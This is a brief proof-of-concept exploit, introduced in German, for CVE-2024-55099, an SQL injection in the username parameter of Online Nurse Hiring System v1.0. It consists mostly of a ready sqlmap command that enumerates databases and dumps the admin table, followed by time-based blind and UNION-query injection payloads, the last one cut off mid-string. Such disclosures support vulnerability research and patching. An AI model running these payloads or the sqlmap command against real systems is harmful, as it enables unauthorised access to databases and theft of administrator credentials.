
Proof-of-concept-Exploit für CVE-2024-55099, der eine SQL-Injection im Online Nurse Hiring System v1.0 über einen unbereinigten Username-Parameter demonstriert und Datenbank-Enumeration sowie Authentifizierungsumgehung ermöglicht.
sqlmap -r r.txt -dbs --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e
---
